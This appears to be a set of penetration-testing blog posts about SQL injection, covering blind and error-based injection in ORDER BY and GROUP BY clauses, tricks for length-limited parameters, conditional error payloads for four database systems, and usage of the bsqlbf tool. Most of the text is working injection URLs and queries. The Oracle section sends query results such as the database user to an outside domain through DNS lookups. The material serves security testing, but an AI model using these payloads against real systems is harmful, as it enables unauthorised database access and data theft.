www.notsosecure.com

Exploiting SQL Injections when the input goes in the order by clause, is a bit tricky as after 'order by' clause union queries are not permitted. The following could be used in such scenario to form blind sql injection cases:

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;

+——+

| id   |

+——+

|    1 | 

+——+

1 row in set (0.00 sec)

—-

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;

ERROR 1242 (21000): Subquery returns more than 1 row

—–

For injections where user's input goes to the group by clause, union queries can be used although the above technique will also work for blind injection examples:  mysql> select id from news where id =1 group by id union select 2222;

+——+

| id   |

+——+

|    1 |

| 2222 | 

+——+

2 rows in set (0.00 sec) 

Often While exploiting SQL Injections, one encounters restrictions on the length of input a vulnerable parameter can take. e.g

• http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version– works

• http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables– may not work(too long)

One solution to this problem could be:-

• http://myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables–

• http://myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','xx.tn'–

• http://myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx–

 Thanks Ferruh for the help

Bsqlbf was originally written by  A. Ramos from www.514.es and was intended to exploit blind sql injection against mysql backend database. This is a modified version of the same tool. It supports blind sql injection against the following databases:-

MS-SQL

MY-SQL

PostgreSQL

Oracle

It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.  

It supports 2 modes of attack(-type):

Type 0: Blind SQL Injection based on True And Flase response

Type 1: Blind SQL Injection based on True And Error Response(details) 

Usage: $./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"

Download: http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip

Send Your feedbacks/suggestions to sid-at-notsosecure(dot)com 

Occasionally when exploiting SQL injections there are conditions when application does not show different pages for true and false result of sql query. If the database server does not resolve host names(thus prohibiting out of band attacks), the attack vector that is used to exploit such conditions is to use functions such as 'waitfor delay' which makes database sleep for specified seconds. Thus a true condition will return the output with a time delay whereas a false condition will result in prompt response.

In some cases application returns different output(or error) if the syntax of the SQL query is wrong. In these conditions instead of carrying out time based attacks one could use the if statements to manipulate the sql query.

The following query will return a divide by zero error when the condition is true:-

Oracle:-

select case when user='SYS' then 1/0 else (select 1 from dual) end from dual 

MS-SQL :-

if ((select user) = 'sa' OR (select user) = 'dbo') select 1/0 else select 1 

update:- select case when( 1=1) then 1 else 1/0 end  

POSTGRES :-

SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END;

update:-case when (1=1) then 1 else (1 * (select 1 from information_schema.tables)) end)=1 

MY-SQL:- 

Doesn't work. Careful, there is a IF query handling Denial OF service which kills the database in old versions. 

update:- select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1 

returns error 'multiple rows returned by subquery'  when the condition is false 

— 

Thanks pentestmonkey for providing some useful queries 

– 

Recently i came across a SQL Injection against oracle database, where the vulnerable parameter was taking comma separated input.

Thus Valid input will look like:- index.do?id=1,200

And it was easier to confirm that its vulnerable to sql injection by making true and false responses:-

True response:- index.do?id=1,200 and 1=1

False Response:- index.do?id=1,200 and 1=2

This way i could carry out the bind sql injection, but then i tried to get data through out of band channeling  and that worked too:-

example:-index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(

(SELECT+user+from+dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null

However, the problem arrived when i had to get data by iterating through rows. In order, to iterate through rows i use the following syntax:-

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;

But As this application was taking comma separated values, this comma resulted in my query being structured in some other way and the application returned error.

A solution to this is to use the query like:-

index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(

(SELECT+column_name+from+all_tab_columns+where+rownum<2+and+

column_name+not+in

(select+column_name+from+all_tab_columns where+rownum<4 ))||

'.a.notsosecure.com')+FROM+dual)+is+not+null

By increasing the rownum number (in bold) iteration could be achieved. However, as this number increases the backend queries become more and more cpu intensive. I still could not do union select query as the original query select more than one column and i could not figure out a way to do union select without entering comma.

—-
A good resource for pentesting oracle Application server can be found here:-

Oracle Application Scanner(OAPscan) is also a very handy tool. 

—